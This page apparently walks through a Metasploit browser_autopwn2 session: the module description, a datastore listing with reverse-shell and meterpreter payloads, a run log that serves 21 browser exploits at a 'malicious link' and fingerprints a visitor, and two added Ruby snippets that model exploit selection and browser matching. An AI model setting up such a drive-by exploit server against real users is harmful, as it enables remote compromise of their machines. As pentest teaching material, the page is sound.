Thanks to the msf committers. For more details about browser_autopwn2, see the Rapid7 blog posts linked at the end of this page.
msf auxiliary(browser_autopwn2) > info
Name: HTTP Client Automatic Exploiter 2 (Browser Autopwn)
Module: auxiliary/server/browser_autopwn2
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2015-07-05
Provided by:
sinn3r <sinn3r@metasploit.com>
Available actions:
Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits
Basic options:
Name             Current Setting  Required  Description
----             ---------------  --------  -----------
EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
INCLUDE_PATTERN                   no        Pattern search to include specific modules
Retries          true             no        Allow the browser to retry the module
SRVHOST          0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT          8080             yes       The local port to listen on.
SSL              false            no        Negotiate SSL for incoming connections
SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
URIPATH          /welcome         no        The URI to use for this exploit (default is random)
Description:
This module will automatically serve browser exploits. Here are the
options you can configure: The Include option allows you to specify
the kind of exploits to be loaded. For example, if you wish to load
just Adobe Flash exploits, then you can set Include to
'adobe_flash'. The Exclude option will ignore exploits. For example,
if you don't want any Adobe Flash exploits, you can set this. Also
note that the Exclude option will always be evaluated after the
Include option. The MaxExploits option specifies the max number of
exploits to load by Browser Autopwn. By default, 20 will be loaded.
But note that the client will probably not be vulnerable to all 20
of them, so only some will actually be served to the client. The
Content option allows you to provide a basic webpage. This is what
the user behind the vulnerable browser will see. You can simply set
a string, or you can do the file:// syntax to load an HTML file.
Note this option might break exploits so try to keep it as simple as
possible. The WhiteList option can be used to avoid visitors that
are outside the scope of your pentest engagement. IPs that are not
on the list will not be attacked. The MaxSessions option is used to
limit how many sessions Browser Autopwn is allowed to get. The
default -1 means unlimited. Combining this with other options such
as RealList and Custom404, you can get information about which
visitors (IPs) clicked on your malicious link, what exploits they
might be vulnerable to, redirect them to your own internal training
website without actually attacking them. The RealList is an option
that will list what exploits the client might be vulnerable to based
on basic browser information. If possible, you can run the exploits
for validation. For more information about Browser Autopwn, please
see the reference link.
References:
https://community.rapid7.com/community/metasploit/blog/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2
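The description above uses shorthand names for several options; the datastore names that `set` shows later on this page are INCLUDE_PATTERN and EXCLUDE_PATTERN (Include/Exclude), MaxExploitCount (MaxExploits), HTMLContent (Content), MaxSessionCount (MaxSessions), ShowExploitList (RealList) and CUSTOM404. The Ruby below is an added example, not Metasploit's own code: it models the include-then-exclude filtering, the MaxExploitCount cap, and the "highest ranking, then newest" ordering the module announces at start-up, over a constructed candidate list whose module names come from this page's exploit table and whose disclosure dates are placeholders rather than the modules' real dates.

```ruby
# Added example, not Metasploit's own code: models how browser_autopwn2's
# INCLUDE_PATTERN, EXCLUDE_PATTERN and MaxExploitCount settings narrow the
# exploit list, and the "highest rank, then newest" order the module announces
# when it starts. Module names are taken from the exploit table on this page;
# rank values are Metasploit's standard ones; the disclosure dates are
# constructed placeholders, not the modules' real disclosure dates.
require 'date'

# Numeric rank values used by Metasploit (ExcellentRanking .. ManualRanking).
RANK = {
  'Excellent' => 600, 'Great' => 500, 'Good' => 400, 'Normal' => 300,
  'Average' => 200, 'Low' => 100, 'Manual' => 0
}.freeze

Candidate = Struct.new(:name, :rank, :disclosed)

# Constructed candidate set (dates are illustrative only).
CANDIDATES = [
  Candidate.new('firefox_webidl_injection',                  'Excellent', Date.new(2014, 4, 1)),
  Candidate.new('firefox_svg_plugin',                        'Excellent', Date.new(2013, 1, 8)),
  Candidate.new('webview_addjavascriptinterface',            'Excellent', Date.new(2012, 12, 21)),
  Candidate.new('adobe_flash_hacking_team_uaf',              'Great',     Date.new(2015, 7, 6)),
  Candidate.new('adobe_flash_opaque_background_uaf',         'Great',     Date.new(2015, 7, 8)),
  Candidate.new('adobe_flash_nellymoser_bof',                'Great',     Date.new(2015, 6, 23)),
  Candidate.new('adobe_flash_pixel_bender_bof',              'Great',     Date.new(2014, 4, 28)),
  Candidate.new('ms14_064_ole_code_execution',               'Good',      Date.new(2014, 11, 11)),
  Candidate.new('adobe_flash_uncompress_zlib_uninitialized', 'Good',      Date.new(2014, 12, 9)),
  Candidate.new('wellintech_kingscada_kxclientdownload',     'Good',      Date.new(2013, 1, 1))
].freeze

# Apply the include pattern first, then the exclude pattern (the module
# description notes Exclude is always evaluated after Include), order by rank
# and then disclosure date descending, and cap the list at MaxExploitCount.
def select_exploits(mods, include_pattern: nil, exclude_pattern: nil, max: 20)
  list = mods
  unless include_pattern.to_s.empty?
    list = list.select { |m| m.name =~ Regexp.new(include_pattern, Regexp::IGNORECASE) }
  end
  unless exclude_pattern.to_s.empty?
    list = list.reject { |m| m.name =~ Regexp.new(exclude_pattern, Regexp::IGNORECASE) }
  end
  list.sort_by { |m| [-RANK.fetch(m.rank), -m.disclosed.jd] }.first(max)
end

# Render the selection the way the module's start-up table presents it.
def exploit_table(mods)
  mods.each_with_index.map { |m, i| format('%-2d %-9s %s', i + 1, m.rank, m.name) }
end

if $PROGRAM_NAME == __FILE__
  puts exploit_table(select_exploits(CANDIDATES, include_pattern: 'adobe_flash',
                                                 exclude_pattern: 'uaf', max: 5))
end
```

The equivalent settings in msfconsole are `set INCLUDE_PATTERN adobe_flash`, `set EXCLUDE_PATTERN uaf` and `set MaxExploitCount 5`; because the exclude pattern runs second, it can only remove modules the include pattern already let through.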
msf auxiliary(browser_autopwn2) > set
Global
======
No entries in data store.
Module: server/browser_autopwn2
===============================
Name Value
---- -----
CUSTOM404 https://www.exploit-db.com/
CookieName __ua
ExploitReloadTimeout 3000
HTML::base64 none
HTML::javascript::escape 0
HTML::unicode none
HTMLContent hello world
HTTP::chunked false
HTTP::compression none
HTTP::header_folding false
HTTP::junk_headers false
HTTP::server_name Apache
InitialAutoRunScript migrate -f
JsObfuscate 0
LHOST 192.168.1.108
MaxExploitCount 21
MaxSessionCount -1
PAYLOAD_ANDROID android/meterpreter/reverse_tcp
PAYLOAD_ANDROID_LPORT 4443
PAYLOAD_FIREFOX firefox/shell_reverse_tcp
PAYLOAD_FIREFOX_LPORT 4442
PAYLOAD_GENERIC generic/shell_reverse_tcp
PAYLOAD_GENERIC_LPORT 4459
PAYLOAD_JAVA java/meterpreter/reverse_tcp
PAYLOAD_JAVA_LPORT 4448
PAYLOAD_LINUX linux/x86/meterpreter/reverse_tcp
PAYLOAD_LINUX_LPORT 4445
PAYLOAD_OSX osx/x86/shell_reverse_tcp
PAYLOAD_OSX_LPORT 4447
PAYLOAD_UNIX cmd/unix/reverse
PAYLOAD_UNIX_LPORT 4446
PAYLOAD_WIN windows/meterpreter/reverse_tcp
PAYLOAD_WIN_LPORT 4444
Retries true
SRVHOST 0.0.0.0
SRVPORT 8080
SSL false
SSLCompression false
ShowExploitList true
TCP::max_send_size 0
TCP::send_delay 0
URIPATH /welcome
VERBOSE true
msf auxiliary(browser_autopwn2) > show options
Module options (auxiliary/server/browser_autopwn2):
Name             Current Setting  Required  Description
----             ---------------  --------  -----------
EXCLUDE_PATTERN                   no        Pattern search to exclude specific modules
INCLUDE_PATTERN                   no        Pattern search to include specific modules
Retries          true             no        Allow the browser to retry the module
SRVHOST          0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT          8080             yes       The local port to listen on.
SSL              false            no        Negotiate SSL for incoming connections
SSLCert                           no        Path to a custom SSL certificate (default is randomly generated)
URIPATH          /welcome         no        The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits
msf auxiliary(browser_autopwn2) > run
[*] Auxiliary module execution completed
[*] Searching BES exploits, please wait...
msf auxiliary(browser_autopwn2) > [*] Starting exploit modules...
msf auxiliary(browser_autopwn2) >
[*] Starting listeners...
[*] Time spent: 9.462520245
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Using URL: http://0.0.0.0:8080/welcome
[*] Local IP: http://192.168.1.108:8080/welcome
[*] The following is a list of exploits that BrowserAutoPwn will consider using.
[*] Exploits with the highest ranking and newest will be tried first.
Exploits
========
Order Rank Name Path Payload
----- ---- ---- ---- -------
1 Excellent firefox_webidl_injection /gmLTYN firefox/shell_reverse_tcp on 4442
2 Excellent firefox_tostring_console_injection /JEmVuiQaKIrw firefox/shell_reverse_tcp on 4442
3 Excellent firefox_svg_plugin /obmUrBMlx firefox/shell_reverse_tcp on 4442
4 Excellent firefox_proto_crmfrequest /KmenmjQhUhnT firefox/shell_reverse_tcp on 4442
5 Excellent webview_addjavascriptinterface /TgUj android/meterpreter/reverse_tcp on 4443
6 Excellent samsung_knox_smdm_url /RKbn android/meterpreter/reverse_tcp on 4443
7 Great adobe_flash_shader_drawing_fill /BMAAabhunvx windows/meterpreter/reverse_tcp on 4444
8 Great adobe_flash_opaque_background_uaf /GBwNOaqCYlFW windows/meterpreter/reverse_tcp on 4444
9 Great adobe_flash_nellymoser_bof /NZVMFwLZMLgbr windows/meterpreter/reverse_tcp on 4444
10 Great adobe_flash_hacking_team_uaf /MIfAzyPrpkm windows/meterpreter/reverse_tcp on 4444
11 Great adobe_flash_worker_byte_array_uaf /YvafdTNG windows/meterpreter/reverse_tcp on 4444
12 Great adobe_flash_domain_memory_uaf /WpEdowncDoshx windows/meterpreter/reverse_tcp on 4444
13 Great adobe_flash_copy_pixels_to_byte_array /IrnNHy windows/meterpreter/reverse_tcp on 4444
14 Great adobe_flash_casi32_int_overflow /ExycSI windows/meterpreter/reverse_tcp on 4444
15 Great adobe_flash_uncompress_zlib_uaf /bPjzBO windows/meterpreter/reverse_tcp on 4444
16 Great adobe_flash_shader_job_overflow /uoDtKDBidW windows/meterpreter/reverse_tcp on 4444
17 Great adobe_flash_pixel_bender_bof /rZclWjWFPbnD windows/meterpreter/reverse_tcp on 4444
18 Great adobe_flash_net_connection_confusion /KfTKxIbCnv windows/meterpreter/reverse_tcp on 4444
19 Good wellintech_kingscada_kxclientdownload /OFwAxIJNjLyV windows/meterpreter/reverse_tcp on 4444
20 Good ms14_064_ole_code_execution /OUcjis windows/meterpreter/reverse_tcp on 4444
21 Good adobe_flash_uncompress_zlib_uninitialized /VPZdapAQVLH windows/meterpreter/reverse_tcp on 4444
[+] Please use the following URL for the browser attack:
[+] BrowserAutoPwn URL: http://192.168.1.108:8080/welcome
[*] Server started.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - No cookie received, resorting to headers hash.
[*] 192.168.1.108 browser_autopwn2 - Gathering target information.
[*] 192.168.1.108 browser_autopwn2 - Sending HTML response.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Info receiver page called.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Received cookie 'WkrwqI'.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Received sniffed browser data over POST:
192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - {"os_name"=>["Linux"], "os_vendor"=>["undefined"], "os_device"=>["undefined"], "ua_name"=>["Firefox"], "ua_ver"=>["35.0"], "arch"=>["x86_64"], "java"=>["null"], "silverlight"=>["false"], "flash"=>["null"], "vuln_test"=>["true"]}.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Received cookie 'WkrwqI'.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Serving exploit to user with tag WkrwqI
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Setting target "WkrwqI" to :tried.
[*] 192.168.1.108 browser_autopwn2 - 192.168.1.108 browser_autopwn2 - Received cookie 'WkrwqI'.
[*] 192.168.1.108 browser_autopwn2 - User 192.168.1.108 (Tag: WkrwqI) visited our malicious link, but no exploits found suitable.
[*] 192.168.1.108 browser_autopwn2 - No suitable exploits to send.
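The client in the log above reported Firefox 35.0 on Linux x86_64 with no Java, Flash or Silverlight, and none of the 21 loaded exploits accepted that profile, so the module logged that no exploits were suitable. The Ruby below is an added example, not Metasploit's own code: it takes the sniffed hash exactly as logged (every value arrives as a one-element array because it comes from a form-encoded POST, and absent plugins come back as the strings "null" or "undefined") and matches it against constructed per-exploit requirement sets. Those requirement sets are illustrative and are not the real modules' target checks.

```ruby
# Added example, not Metasploit's own code: shows how the browser data the
# BES receives over POST (the hash logged on this page, reproduced verbatim)
# can be matched against per-exploit browser requirements, and why a Firefox
# 35.0 / Linux client with no Flash or Java ends up with "No suitable exploits
# to send". The requirement sets are constructed for illustration; they are
# not the real modules' target checks.
require 'rubygems'

# The sniffed data as the page shows it (form-encoded POST => one-element arrays).
SNIFFED = {
  "os_name"=>["Linux"], "os_vendor"=>["undefined"], "os_device"=>["undefined"],
  "ua_name"=>["Firefox"], "ua_ver"=>["35.0"], "arch"=>["x86_64"],
  "java"=>["null"], "silverlight"=>["false"], "flash"=>["null"], "vuln_test"=>["true"]
}.freeze

# Unwrap the arrays and turn the JS strings "null"/"undefined" (sent when a
# plugin or property is absent) into nil so absence can be tested directly.
def normalize(raw)
  raw.each_with_object({}) do |(key, value), info|
    v = value.is_a?(Array) ? value.first : value
    info[key] = %w[null undefined].include?(v) ? nil : v
  end
end

# Constructed requirement sets: every key must match; a String matches
# exactly, a Proc is called with the normalized value and must be truthy.
REQUIREMENTS = {
  'firefox_example'     => { 'ua_name' => 'Firefox',
                             'ua_ver'  => ->(v) { v && Gem::Version.new(v) < Gem::Version.new('23.0') } },
  'adobe_flash_example' => { 'os_name' => 'Windows', 'flash' => ->(v) { !v.nil? } },
  'webview_example'     => { 'os_name' => 'Android' }
}.freeze

# Return the names of the exploits whose every requirement the client satisfies.
def suitable_exploits(raw, reqs = REQUIREMENTS)
  info = normalize(raw)
  reqs.select do |_name, req|
    req.all? do |key, want|
      got = info[key]
      want.respond_to?(:call) ? !!want.call(got) : got == want
    end
  end.keys
end

if $PROGRAM_NAME == __FILE__
  p suitable_exploits(SNIFFED)                              # the page's client
  p suitable_exploits(SNIFFED.merge("ua_ver" => ["17.0"]))  # an older Firefox
end
```

Running `suitable_exploits(SNIFFED)` returns an empty list for the logged client, which is the decision behind the "no exploits found suitable" line; the same client with an older Firefox version string, or a Windows client that reports a Flash version, matches the corresponding constructed requirement set instead.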
https://community.rapid7.com/community/metasploit/blog/2015/07/15/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-1
https://community.rapid7.com/community/metasploit/blog/2015/07/16/the-new-metasploit-browser-autopwn-strikes-faster-and-smarter--part-2